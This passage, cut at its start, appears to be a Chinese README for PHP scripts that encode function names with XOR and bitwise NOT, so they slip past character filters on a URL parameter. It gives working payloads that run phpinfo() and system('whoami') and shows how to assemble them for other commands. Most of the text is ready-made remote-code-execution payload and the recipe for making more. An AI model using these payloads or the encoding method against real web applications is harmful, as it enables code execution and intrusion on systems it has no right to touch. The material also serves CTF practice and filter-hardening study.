hu

2.py--异或绕过

第二个脚本会返回所有字母的异或组合，得自己手工找拼出命令

3.php--异或绕过(括号括起来即可)

运行：php 3.php
例如：
(1)要执行phpinfo,运行脚本，得到phpinfo的异或字符：%8f%97%8f%96%91%99%90^%ff%ff%ff%ff%ff%ff%ff
，传参为`?xxx=(%8f%97%8f%96%91%99%90^%ff%ff%ff%ff%ff%ff%ff)();
即(phpinfo)();
(2)想要执行system('whoami');
[1]先把脚本改为$a='system';得到%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff
[2]再改为$a='whoami';得到%88%97%90%9e%92%96^%ff%ff%ff%ff%ff%ff
最后拼接得到?xxx=(%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff)(%88%97%90%9e%92%96^%ff%ff%ff%ff%ff%ff);

4.php--取反绕过

运行php 4.php
(1)执行system('whoami');
[1]先改，得到system的为~(%8c%86%8c%8b%9a%92)
[2]再改，得到whoami的为~(%88%97%90%9e%92%96)
最后拼接：?xxx=(~(%8c%86%8c%8b%9a%92))(~(%88%97%90%9e%92%96))
或?xxx=(~%8c%86%8c%8b%9a%92)(~%88%97%90%9e%92%96)也行